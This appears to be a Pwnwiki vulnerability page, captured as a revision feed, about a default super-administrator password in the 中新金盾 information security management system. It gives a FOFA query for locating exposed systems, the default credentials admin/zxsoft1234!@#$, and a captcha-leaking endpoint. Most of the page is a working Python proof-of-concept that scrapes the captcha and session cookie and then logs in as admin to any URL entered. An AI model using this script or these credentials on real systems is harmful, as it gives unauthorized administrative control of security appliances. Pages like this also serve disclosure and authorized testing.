https://pwnwiki.com/index.php?action=history&feed=atom&title=%E4%B8%AD%E6%96%B0%E9%87%91%E7%9B%BE%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8%E7%AE%A1%E7%90%86%E7%B3%BB%E7%B5%B1_%E9%BB%98%E8%AA%8D%E8%B6%85%E7%B4%9A%E7%AE%A1%E7%90%86%E5%93%A1%E5%AF%86%E7%A2%BC%E6%BC%8F%E6%B4%9E%2Fzh-hant
中新金盾信息安全管理系統 默認超級管理員密碼漏洞/zh-hant - Revision history
2026-04-06T14:29:28Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=%E4%B8%AD%E6%96%B0%E9%87%91%E7%9B%BE%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8%E7%AE%A1%E7%90%86%E7%B3%BB%E7%B5%B1_%E9%BB%98%E8%AA%8D%E8%B6%85%E7%B4%9A%E7%AE%A1%E7%90%86%E5%93%A1%E5%AF%86%E7%A2%BC%E6%BC%8F%E6%B4%9E/zh-hant&diff=3570&oldid=prev
Pwnwiki: Created page with "==默認帳號密碼=="
2021-05-26T13:47:20Z
<p>Created page with "==默認帳號密碼=="</p>
<p><b>New page</b></p><div><languages /><br />
<br />
==漏洞影響==<br />
<pre><br />
中新金盾信息安全管理系统<br />
</pre><br />
<br />
==FOFA==<br />
<pre><br />
title="中新金盾信息安全管理系统"<br />
</pre><br />
<br />
<br />
==默認帳號密碼==<br />
<pre><br />
admin/zxsoft1234!@#$<br />
</pre><br />
<br />
<br />
==驗證碼==<br />
<br />
請求<br />
<pre><br />
?q=common/getcode<br />
</pre><br />
返回了驗證碼。<br />
<br />
==POC==<br />
<pre><br />
import requests<br />
import sys<br />
import random<br />
import re<br />
import base64<br />
import time<br />
from requests.packages.urllib3.exceptions import InsecureRequestWarning<br />
<br />
def title():<br />
print('+------------------------------------------')<br />
print('+ \033[34mPOC_Des: http://wiki.peiqi.tech \033[0m')<br />
print('+ \033[34mGithub : https://github.com/PeiQi0 \033[0m')<br />
print('+ \033[34m公众号 : PeiQi文库 \033[0m')<br />
print('+ \033[34mVersion: 中新金盾信息安全管理系统 默认超级管理员密码漏洞 \033[0m')<br />
print('+ \033[36m使用格式: python3 poc.py \033[0m')<br />
print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx \033[0m')<br />
print('+------------------------------------------')<br />
<br />
def POC_1(target_url):<br />
vuln_url = target_url + "?q=common/getcode"<br />
headers = {<br />
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",<br />
}<br />
try:<br />
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)<br />
response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5)<br />
print("\033[36m[o] 正在获取验证码 {}?q=common/getcode ..... \033[0m".format(target_url))<br />
response_data = response.headers['Set-Cookie']<br />
check_code = re.findall(r'check_code=(.*?);', response_data)[0]<br />
PHPSESSID = re.findall(r'PHPSESSID=(.*?);', response_data)[0]<br />
print("\033[36m[o] 验证码:{}\n[o] PHPSESSID:{} \033[0m".format(check_code, PHPSESSID))<br />
POC_2(target_url, check_code, PHPSESSID)<br />
<br />
except Exception as e:<br />
print("\033[31m[x] 请求失败 \033[0m", e)<br />
<br />
def POC_2(target_url, check_code, PHPSESSID):<br />
vuln_url = target_url + "?q=common/login"<br />
headers = {<br />
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",<br />
"Cookie":"PHPSESSID={}; check_code={}".format(PHPSESSID, check_code),<br />
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"<br />
}<br />
data = "name=admin&password=zxsoft1234!%40%23%24&checkcode={}&doLoginSubmit=1".format(check_code)<br />
try:<br />
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)<br />
response = requests.post(url=vuln_url, headers=headers, data=data, verify=False, timeout=5)<br />
if "1" in response.text and response.status_code == 200:<br />
print("\033[36m[o] 目标 {} 存在默认管理员弱口令 admin / zxsoft1234!@#$ \033[0m".format(target_url))<br />
else:<br />
print("\033[31m[x] 目标 {} 不存在默认管理员弱口令 \033[0m".format(target_url))<br />
except Exception as e:<br />
print("\033[31m[x] 请求失败 \033[0m", e)<br />
<br />
<br />
if __name__ == '__main__':<br />
title()<br />
target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m"))<br />
POC_1(target_url)<br />
</pre><br />
<br />
==參考==<br />
https://mp.weixin.qq.com/s/DWuUlbtFU-MiGE3zw1w8Yg</div>
Pwnwiki